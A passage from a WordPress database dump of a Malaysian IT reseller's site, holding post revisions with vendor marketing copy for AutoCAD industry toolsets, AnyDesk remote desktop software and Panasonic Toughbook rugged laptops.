src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"600\" height=\"66\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-12 10:03:42','2018-12-12 02:03:42','',1444,'https://bintara.com.my/blog/2018/12/12/1444-revision-v1/',0,'revision','',0),(2676,1,'2018-12-21 09:24:17','2018-12-21 01:24:17','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h2 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h2>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-color-white wd-light wd-font-16 wd-mt-6\"><strong>Autodesk</strong> makes software for people who make things. If youâ€™ve ever driven a high-performance car, admired a towering skyscraper, used a smartphone, or watched a great film, chances are youâ€™ve experienced what millions of Autodesk customers are doing with our software.</p>\r\n\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"500\" height=\"55\" /></div>\r\n<div class=\"heading section\">\r\n<h3 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">What\'s included</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"55\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-21 09:24:17','2018-12-21 01:24:17','',1444,'https://bintara.com.my/blog/2018/12/21/1444-revision-v1/',0,'revision','',0),(1757,1,'2018-12-12 10:08:51','2018-12-12 02:08:51','<h2>Anydesk</h2>\r\n<h2 class=\"u-font-size-xl u-space-mt-1/2 u-space-mb-1/4\">Remote Desktop Software That Actually Works</h2>\r\n<div class=\"o-header__subheading u-font-size-m u-space-mb-1/4 u-color-mid-gray\">\r\n\r\nConnect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n\r\n</div>\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n<h2 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h2>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','inherit','closed','closed','','1437-revision-v1','','','2018-12-12 10:08:51','2018-12-12 02:08:51','',1437,'https://bintara.com.my/blog/2018/12/12/1437-revision-v1/',0,'revision','',0),(1760,1,'2018-12-12 14:53:04','2018-12-12 06:53:04','Rugged Laptop and Rugged Tablet. Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1719\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Toughbook-Logo-V2.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','PANASONIC TOUGHBOOK','','inherit','closed','closed','','1418-autosave-v1','','','2018-12-12 14:53:04','2018-12-12 06:53:04','',1418,'https://bintara.com.my/blog/2018/12/12/1418-autosave-v1/',0,'revision','',0),(1761,1,'2018-12-12 10:12:19','2018-12-12 